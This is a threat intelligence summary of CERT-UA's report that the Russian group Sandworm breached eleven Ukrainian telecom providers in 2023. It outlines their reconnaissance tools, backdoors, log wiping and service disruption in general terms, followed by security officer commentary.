Russian Sandworm Hackers Breached 11 Ukrainian Telcos Since May

Cyber Security Threat Summary:
The state-sponsored Russian hacking group tracked as 'Sandworm' has compromised eleven telecommunication service providers in Ukraine between May and September 2023. That is based on a new report by Ukraine's Computer Emergency Response Team (CERT-UA) citing 'public resources' and information retrieved from some breached providers” (Bleeping Computer, 2023).

CERT-UA says that Russian hackers interfered with the communication systems of 11 telecommunication organizations in the country, which led to service interruptions and potential data breaches.

Sandworm actors performed reconnaissance on the company’s networks using a tool called “masscan”. Specifically, they looked for open ports and unprotected RDP or SSH interfaces, which they could leverage to breach the network. Additionally, the attackers use tools like 'ffuf', 'dirbuster', 'gowitness', and 'nmap' to find potential vulnerabilities in web services that can be exploited to gain access. The group also compromised VPN accounts that were not protected by multi-factor authentication.

“To make their intrusions stealthier, Sandworm uses 'Dante', 'socks5,' and other proxy servers to route their malicious activities through servers within the Ukrainian internet region they compromised previously, making it appear less suspicious” (Bleeping Computer, 2023). CERT-UA says the actors also used the Poemgate and Poseidon backdoors against the breached ISP systems.

  • Poemgate captures the credentials of admins who attempt to authenticate in the compromised endpoint, providing the attackers with access to additional accounts they can use for lateral movement or deeper network infiltration.
  • Poseidon is a Linux backdoor that the Ukrainian agency says "includes the full range of remote computer control tools." Persistence for Poseidon is achieved by modifying Cron to add rogue jobs.
To avoid detection, the group used a tool called “Whitecat” to remove artifacts and delete access logs. At the final stages of the attack, the hackers were seen deploying scripts that would cause service disruption, especially focusing on Mikrotik equipment, and wiped backups to make recovery more challenging.

Security Officer Comments:
Sandworm is a sophisticated state-sponsored threat group linked to Russia’s GRU. They have an extensive history of attacking Ukrainian critical infrastructure. Notably, the group has been linked to the 2015 attacks against Ukraine’s power grid and the destructive NotPetya malware. Since the Russia-Ukraine conflict, the group has been targeting Ukrainian entities with phishing lures, Android malware, and various data-wipers.

CERT-UA has provided all service providers in the country, this best practice guide, and urges the organizations to harden their systems against cyber intruders.